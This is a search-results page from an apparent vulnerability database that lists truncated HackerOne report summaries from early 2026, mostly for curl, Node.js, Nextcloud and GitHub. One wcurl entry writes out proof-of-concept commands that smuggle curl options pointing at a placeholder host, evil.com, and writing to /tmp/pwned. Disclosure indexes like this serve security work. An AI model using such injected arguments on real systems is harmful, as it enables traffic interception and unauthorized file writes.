Lucene search
K
HackeroneRecent

15369 matches found

Hacker One
Hacker One
added 2026/02/10 1:35 p.m.12 views

Monero: Inverted ternary in peerlist_manager::filter() allows unlimited whitelist entries per host via different ports

The peerlistmanager::filter function in the Monero project's p2p/netpeerlist.h file contained an incorrect ternary operator that operated on the wrong peer list. When called with 'white=true', it filtered the gray list instead of the white list. As a result, a single host could accumulate unlimit...

5.8AI score
Exploits0
Hacker One
Hacker One
added 2026/02/09 8:44 p.m.12 views

Node.js: Assertion error in node_url.cc via malformed URL format leads to Node.js crash

An assertion error in nodeurl.cc via malformed URL format leads to a Node.js crash. A flaw in the URL processing caused an assertion failure in the native code when url.format was called with a malformed internationalized domain name containing invalid characters, crashing the Node.js process. Th...

5.7CVSS6.3AI score0.00325EPSS
Exploits0
Hacker One
Hacker One
added 2026/02/07 3:59 p.m.10 views

Basecamp: Improper Access Control in `fizzy.do` import flow allows cross-tenant ActionText reference resolution and data disclosure

The vulnerability allowed for cross-tenant ActionText reference resolution and data disclosure during the account import flow. The import process did not properly verify the ownership of the referenced records before minting signed global IDs, enabling an attacker to access and disclose data from...

5.8AI score
Exploits0
Hacker One
Hacker One
added 2026/02/06 9:22 p.m.14 views

RubyGems: Server-side ReDoS via user-controlled regex in OIDC Access Policy

The OIDC Access Policy implementation evaluated user-supplied regular expressions against JWT claim values using Ruby's Regexp engine without any timeout or complexity validation. The vulnerable code path was Regexp.newvalue.match?claimvalue, where value was fully user-controlled and claimvalue w...

5.8AI score
Exploits0
Hacker One
Hacker One
added 2026/02/01 1:35 p.m.17 views

Node.js: Timing side-channel in HMAC verification via memcmp() in crypto_hmac.cc leads to potential MAC forgery

Vulnerability description not provided...

5.9CVSS6.2AI score0.00385EPSS
Exploits0
Hacker One
Hacker One
added 2026/01/30 2:35 p.m.10 views

Node.js: Memory leak in Node.js HTTP/2 server via WINDOW_UPDATE on stream 0 leads to resource exhaustion

Vulnerability description not provided...

5.3CVSS6.2AI score0.00454EPSS
Exploits0
Hacker One
Hacker One
added 2026/01/30 7:5 a.m.43 views

curl: MQTT Protocol Packet Injection via Unchecked CONNACK Remaining Length

I'm not sure if this is a vulnerability or intended behavior, but I noticed that curl MQTT implementation accepts CONNACK packets with Remaining Length values greater than 2, which appears to violate the MQTT v3.1.1 specification. According to the MQTT spec, CONNACK packets should have a Remainin...

5.9AI score
Exploits0
Hacker One
Hacker One
added 2026/01/27 11:26 p.m.17 views

GitHub: Add labels to arbitrary issues/prs & compromise github actions label checks

A vulnerability was identified that allowed a user with read access to a repository and write access to a project to modify issue and pull request metadata through the project. When adding an item to a project that already existed, column value updates were applied without verifying the actor's...

5.3CVSS5.8AI score0.00321EPSS
Exploits0
Hacker One
Hacker One
added 2026/01/26 11:3 a.m.10 views

Fastify: DoS via Unbounded Memory Allocation in sendWebStream on Fastify v5.7.0+ leads to OOM crash when backpressure is ignored

A vulnerability was discovered in Fastify versions 5.7.0 and later. The issue was in the "sendWebStream" function, which failed to handle TCP backpressure correctly. When a ReadableStream was sent as a response, Fastify continuously pulled data from the stream producer and wrote it to the respons...

3.7CVSS5.9AI score0.00488EPSS
Exploits0
Hacker One
Hacker One
added 2026/01/25 4:20 p.m.36 views

curl: wcurl Argument Injection via Unquoted Variable

when i was code auditing curl i stumbled uppon a vulnerablity that was on wcurl affected version:current step 1: open terminal step 2:run pocs below wcurl --dry-run --curl-options='-x http://evil.com:8080 -o /tmp/pwned' https://example.com/test.txt wcurl --dry-run --curl-options='-o...

6AI score
Exploits0
Hacker One
Hacker One
added 2026/01/25 11:41 a.m.10 views

Tucows (VDP): Password Strength Policy Bypass via Server-Side Validation Flaw

A password strength policy bypass was discovered due to a server-side validation flaw. The password strength policy was only enforced in the browser, not on the server side...

5.9AI score
Exploits0
Hacker One
Hacker One
added 2026/01/25 12:2 a.m.17 views

curl: Integer Underflow in src/var.c

Summary: A potential Integer Underflow vulnerability was identified in the setvariable function within src/var.c. the flaw occurs during the calculation of the variable content length clen when a byte range is specified. specifically, the code fails to validate if startoffset is greater than...

5.9AI score
Exploits0
Hacker One
Hacker One
added 2026/01/23 7:13 p.m.15 views

GitHub: PATs without the required scope can leak issues

An Incorrect Authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated user with a classic personal access token PAT lacking the repo scope to retrieve issues and commits from private and internal repositories via the search REST API endpoints. The user...

5.3CVSS5.8AI score0.00248EPSS
Exploits0
Hacker One
Hacker One
added 2026/01/23 4:7 a.m.11 views

Nextcloud: View-only guests could see deleted Collectives pages in the trashbin

A vulnerability was discovered where view-only guests could see deleted Collectives pages in the trashbin...

2.6CVSS5.8AI score0.00189EPSS
Exploits0
Hacker One
Hacker One
added 2026/01/21 3:7 a.m.10 views

Nextcloud: IDOR on ██████ via direct photo URL leads to unauthorized access to deleted and other users' photos

Summary: An Insecure Direct Object Reference IDOR vulnerability exists in the application that allows unauthorized access to photos belonging to other users. The application does not properly validate whether the logged-in user is authorized to access a photo when accessing it via direct URL. Thi...

5.9AI score
Exploits0
Hacker One
Hacker One
added 2026/01/20 9:29 p.m.10 views

Weblate: Argument Injection in /manage/ssh/ via host parameter leads to sensitive file disclosure on Weblate

A vulnerability was discovered in the SSH management interface of Weblate, a web-based translation tool. The vulnerability allowed an attacker with administrative privileges to inject command-line arguments into the host parameter, leading to sensitive file disclosure on the server. The vulnerabl...

9.1CVSS5.4AI score0.00447EPSS
Exploits3
Hacker One
Hacker One
added 2026/01/19 8:10 p.m.57 views

curl: SSL options ISSUERCERT, EC_CURVES and CRLFILE silently ignored by non-OpenSSL backends

Summary: The SSL options ISSUERCERT, ECCURVES and CRLFILE are silently ignored for e.g. the mbedTLS backend, which allows MITM attacks for the ISSUERCERT and CRLFILE bug, and can reduce the security and compliance by ignoring the specified curve for the ECCURVES bug. Affected version Tested with...

5.8AI score
Exploits0
Hacker One
Hacker One
added 2026/01/19 6:46 p.m.27 views

curl: Cross‑origin cookies leak and injection risk when using a custom Host header

Summary When a custom hostname is specified, it is used for cookie matching if the cookie engine is also enabled for this transfer. This matching persists in cross-origin redirects despite that the originally supplied hostname is removed. cookiehost is set from a custom Host header: lib/http.c...

5.7AI score
Exploits0
Hacker One
Hacker One
added 2026/01/19 10:27 a.m.26 views

curl: Cookie Replacement Use-After-Free Vulnerability

Summary: The cookie replacement logic in lib/cookie.c contains a use-after-free vulnerability in the replaceexisting function. The function modifies a linked list while iterating over it, creating potential for memory corruption in concurrent or complex cookie operations. Vulnerable Code Location...

6.1AI score
Exploits0
Hacker One
Hacker One
added 2026/01/19 10:12 a.m.14 views

curl: Cookie Max-Age Integer Overflow Vulnerability

Summary: The cookie parsing code in lib/cookie.c contains an integer overflow vulnerability when processing the Max-Age attribute of HTTP cookies. The vulnerable code attempts to add the max-age value to the current timestamp without adequate overflow protection While the code includes an overflo...

5.7AI score
Exploits0
Hacker One
Hacker One
added 2026/01/17 11:59 a.m.20 views

Sony: Improper State Validation on Sony WH-CH520 via BLE Command Service leads to unauthorized Bluetooth pairing and audio hijacking

A vulnerability was discovered in the firmware of the Sony WH-CH520 headset. The vulnerability allowed an unauthenticated write to a proprietary Sony command service via Bluetooth Low Energy BLE, causing the device to become discoverable and accept a standard Bluetooth Security Manager Protocol S...

7.1CVSS5.5AI score0.06942EPSS
Exploits14
Hacker One
Hacker One
added 2026/01/17 7:52 a.m.40 views

curl: libcurl: Improper Authentication State Management on Cross-Protocol Redirects

Following the recent advisory for CVE-2025-14524, I conducted an investigation into how libcurl manages OAuth2 credentials during complex redirect chains. I have confirmed that while the library successfully protects traditional user credentials, it fails to clear OAuth2 Bearer tokens in the same...

5.7CVSS7.4AI score0.01595EPSS
Exploits2
Hacker One
Hacker One
added 2026/01/17 3:4 a.m.16 views

AWS VDP: Password Reuse Vulnerability on AWS Sign-in Page via Password Reset Flow leads to Security Policy Violation

Asset URL: ██████ Summary: The AWS sign-in page allows users to reuse old passwords when resetting their password, which violates security best practices outlined in OWASP Authentication Cheat Sheet and NIST 800-63B Digital Identity Guidelines. This misconfiguration could potentially weaken accou...

5.6AI score
Exploits0
Hacker One
Hacker One
added 2026/01/16 4:43 a.m.12 views

Nextcloud: Private circle can be added to another circle via API despite visibility restriction

A vulnerability was discovered where private circles could be added to other circles via the API, despite visibility restrictions...

2.6CVSS5.8AI score0.002EPSS
Exploits0
Hacker One
Hacker One
added 2026/01/15 10:0 p.m.11 views

Node.js: HashDoS in V8

Vulnerability description not provided...

5.9CVSS6.5AI score0.00283EPSS
Exploits0
Hacker One
Hacker One
added 2026/01/14 3:27 p.m.16 views

Cosmos: Memory Exhaustion in CometBFT v1.0.1 via malicious ProposalMessage leads to network-wide denial of service

Summary of Impact CometBFT v1.0.1 contains a critical memory exhaustion vulnerability that allows any peer to crash nodes with a single 50-byte P2P message. An attacker can send a malicious ProposalMessage with PartSetHeader.Total set to 2^32-1, causing the receiving node to immediately allocate...

6AI score
Exploits0
Hacker One
Hacker One
added 2026/01/14 5:2 a.m.27 views

GoCD: Information Disclosure via Logback Configuration Injection in GoCD Agent

Summary The GoCD Agent's logging mechanism Logback allows for property substitution and custom configuration loading. By default, the config directory might not exist in the installation path. However, if an attacker creates this directory and places a specially crafted agent-launcher-logback.xml...

5.6AI score
Exploits0
Hacker One
Hacker One
added 2026/01/13 9:2 p.m.23 views

curl: Directory listing vulnerability is disclosing names and emails, widespread (thousands of records, publicly accessible without auth)

Summary: directory listing vulnerability is disclosing names and emails and so many other sensitive information, that significantly increases the severity because these are considered as PII Personally Identifiable Information. Thousands of records, publicly accessible without auth also can be...

6.7AI score
Exploits0
Hacker One
Hacker One
added 2026/01/13 8:7 p.m.12 views

curl: IMAP Protocol Desynchronization and Response Smuggling via Naive Literal Parsing

libcurl incorrectly parses IMAP literals size even when they are embedded within quoted strings e.g., email subjects or headers. This behavior violates RFC 3501, which mandates that content inside double quotes must be treated as opaque text. This parsing error causes the client state machine to...

7AI score
Exploits0
Hacker One
Hacker One
added 2026/01/13 2:31 p.m.14 views

curl: MQTT: unsigned integer underflow bypasses MAX_MQTT_MESSAGE_SIZE check

Summary An unsigned integer underflow exists in libcurl's MQTT publish path. Due to incorrect arithmetic ordering in the size validation logic, oversized MQTT PUBLISH messages are not rejected as intended. Affected version libcurl 8.18.0 Tested on macOS arm64 with AddressSanitizer enabled. Steps ...

7.3AI score
Exploits0
Hacker One
Hacker One
added 2026/01/13 1:30 p.m.18 views

curl: Digest Authentication Header Injection

Summary The Digest authentication implementation in libcurl fails to properly escape the uri parameter in the Authorization header. While other parameters like username, realm, and nonce are correctly escaped using authdigeststringquoted, the uri is inserted raw into the header. This allows an...

7.5AI score
Exploits0
Hacker One
Hacker One
added 2026/01/13 1:16 p.m.15 views

curl: Gopher Protocol Command Injection (SSRF Smuggling)

Summary The curl Gopher protocol handler is vulnerable to command injection through URL-encoded CRLF sequences in the path. This allows an attacker to "smuggle" additional Gopher selectors or arbitrary commands into a single Gopher request. By using %0d%0a in the URL, an attacker can break the...

8.1AI score
Exploits0
Hacker One
Hacker One
added 2026/01/13 11:39 a.m.14 views

curl: Use-After-Free in curl_easy_nextheader when reusing header handle across requests

. The API returns struct curlheader objects that internally reference libcurl-owned linked list nodes. When a new request is performed on the same CURL handle, libcurl frees and rebuilds the internal header list, but previously returned struct curlheader objects remain valid to the application an...

7.8AI score
Exploits0
Hacker One
Hacker One
added 2026/01/13 7:12 a.m.14 views

curl: integer Overflow in MQTT Protocol Handling Allows Bypassing Message Size Limit

Summary: A logic error involving an integer overflow specifically, an unsigned integer underflow exists in the lib/mqtt.c file within the mqttpublish function. This vulnerability allows an attacker or a malicious user configuration to bypass the explicit MAXMQTTMESSAGESIZE check. The vulnerabilit...

7.3AI score
Exploits0
Hacker One
Hacker One
added 2026/01/13 12:50 a.m.18 views

curl: Integer-underflow leads to heap over-read in TFTP implementation

libcurl on commit 3ee1d3b573e6ea36fb478dbd0d9913483b900928 contains a vulnerability in its TFTP implementation that can cause curl or a libcurl-user to send heap memory beyond the bounds of an allocated chunk to a malicious TFTP server. The vulnerability lies in lib/tftp.c, in function...

6.8AI score
Exploits0
Hacker One
Hacker One
added 2026/01/12 2:25 a.m.8 views

MetaMask: Authorization Bypass in Starknet Snap via enableAuthorize parameter leads to unauthorized transaction signing

A critical security vulnerability was discovered in the Starknet Snap by Consensys. The vulnerability allowed malicious websites to bypass user authorization when signing messages or transactions. The vulnerability existed in the enableAuthorize parameter, which could be controlled by any website...

5.6AI score
Exploits0
Hacker One
Hacker One
added 2026/01/10 7:52 p.m.8 views

GitHub: Missing Access Control in MigrationFile allows attacker to upload files to any Migration

A Missing Authorization vulnerability was identified in GitHub Enterprise Server that allowed unauthorized content to be uploaded to a user's repository migration export due to a missing authorization check in the repository migration upload endpoint. The vulnerability could be exploited by...

6.5CVSS5.9AI score0.0039EPSS
Exploits0
Hacker One
Hacker One
added 2026/01/10 7:22 p.m.27 views

curl: Heap Out-of-Bounds Read in lib/http2.c via Malformed PUSH_PROMISE Headers

Summary A heap-based out-of-bounds read vulnerability exists in libcurl's HTTP/2 implementation. The onheader callback in lib/http2.c incorrectly treats header names and values provided by nghttp2 as null-terminated C-strings. Specifically, passing these pointers to curlmaprintf with the %s forma...

7.5AI score
Exploits0
Hacker One
Hacker One
added 2026/01/10 6:58 a.m.18 views

curl: CRLF Injection in HTTP header values allows arbitrary header injection

curl allows carriage return \r and line feed \n characters inside HTTP header values. When attacker-controlled data is used in a header value e.g., Authorization: Bearer , curl construct and sends a malformed HTTP request containing injected headers. This violates HTTP specification RFC 7320 /RFC...

6.7AI score
Exploits0
Hacker One
Hacker One
added 2026/01/08 8:38 a.m.16 views

curl: inconsistently Rejection Logic in file:// URLs with Authority

curl's file:// protocol handler inconsistently applies path sanitization. in reject file://../ as Bad File:// URL" but allows the same traversal when an authority/host e.g.,localhost is present file://localhost/../. this inconsistency misleads developers who rely on the bad file:// URL error for...

7.2AI score
Exploits0
Hacker One
Hacker One
added 2026/01/07 10:12 p.m.16 views

curl: Stack Buffer Overflow in mprintf.c formatting function (fallback path)

Summary A stack-based buffer overflow exists in mprintf.c within the outdouble function. This vulnerability affects builds where HAVESNPRINTF is undefined, forcing the use of the legacy sprintf function. The logic responsible for calculating the maximum safe precision maxprec for floating-point...

7.2AI score
Exploits0
Hacker One
Hacker One
added 2026/01/07 8:44 a.m.11 views

Nextcloud: Authentication Bypass in ID4me handling via Missing JWT Signature Verification in User OIDC

An authentication bypass vulnerability was discovered in the ID4me handling in the OIDC implementation. The vulnerability was caused by missing JWT signature verification for user authentication...

8.1CVSS5.5AI score0.00329EPSS
Exploits1
Hacker One
Hacker One
added 2026/01/06 8:51 a.m.14 views

curl: MQTT: Missing upper bound on incoming Remaining Length allows server-controlled long wait

Curl's MQTT implementation accepts any valid Remaining Length advertised by the server without an explicit upper bound beyond the MQTT spec maximum of 268,435,455 bytes. A malicious server can send a PUBLISH packet claiming this maximum size but provide only minimal payload, causing curl to wait...

6.8AI score
Exploits0
Hacker One
Hacker One
added 2026/01/05 10:13 p.m.15 views

curl: State Isolation Failure in Multiplexed Connections (Shared Auth Context)

Vulnerability: State Isolation Failure in Multiplexed Connections Shared Auth Context Product: libcurl Affected Versions: v7.43.0 - Current v8.x - All versions supporting HTTP/2 Multiplexing Severity: CRITICAL CVSS: 9.1 1. Executive Summary A fundamental design flaw exists in libcurl's state...

6.7AI score
Exploits0
Hacker One
Hacker One
added 2026/01/04 6:34 p.m.10 views

Nextcloud: SVG filter primitives bypass remote image blocking, enabling email tracking without consent.

A vulnerability was discovered in the HTML sanitizer of the Roundcube webmail application. The sanitizer did not properly handle the SVG filter primitive, allowing external resources to be loaded even when the "Block remote images" setting was enabled. This vulnerability could be used to track...

5.8AI score
Exploits0
Hacker One
Hacker One
added 2026/01/03 6:59 p.m.24 views

curl: Path Traversal in curl file:// Protocol Handler Allows Unauthorized File Access

Summary During my manual review of the file path handling logic in curl's source code, I noticed the absence of proper validation for directory traversal sequences, which I then verified through practical testing. I discovered that curl allows unauthorized access to arbitrary files through the...

8.1CVSS8.2AI score0.60122EPSS
Exploits1
Hacker One
Hacker One
added 2026/01/03 4:31 p.m.16 views

curl: Alt-Svc bypasses credential leak protection (CVE-2018-1000007)

Summary I found a bug where curl's Alt-Svc implementation fails to strip sensitive authentication headers Authorization and Cookies when remapping a connection to a different host or port. This essentially bypasses the security fix for CVE-2018-1000007. While auditing the code, I noticed that...

9.8CVSS7.8AI score0.08031EPSS
Exploits0
Hacker One
Hacker One
added 2026/01/03 2:38 a.m.5 views

8x8: jitsi-call-analytics: Unauthenticated arbitrary file write via path traversal in `/api/v1/uploads/analyze`

A path traversal vulnerability was discovered in the /api/v1/uploads/analyze endpoint of the jitsi-call-analytics backend. The vulnerability allowed unauthenticated users to write files within the configured RTCSTATSDOWNLOADSPATH directory. The issue was caused by the upload handler using...

5.8AI score
Exploits0
Hacker One
Hacker One
added 2026/01/02 5:54 a.m.15 views

curl: CRLF Injection in Gopher Protocol (`lib/gopher.c`)

Control characters slip through during URL handling in curl’s Gopher setup. Though null bytes get blocked by the REJECTZERO setting, returns and line feeds remain permitted. A specially built address using percent-encoded breaks - like %0D%0A - opens room for command insertion. Because of how...

7.2AI score
Exploits0
Hacker One
Hacker One
added 2026/01/02 1:51 a.m.19 views

curl: HTTP Request Smuggling and SSRF via CRLF Injection in Curl_add_custom_headers

Summary: A lack of CRLF validation in Curladdcustomheaders at lib/http.c:1761 allows users to inject arbitrary HTTP headers. This violation of RFC 7230 §3.2.4 leads to HTTP Request Smuggling and potential SSRF bypass. AI Disclosure: I utilized an AI assistant to aid in the initial code analysis a...

7.2AI score
Exploits0
Total number of security vulnerabilities15369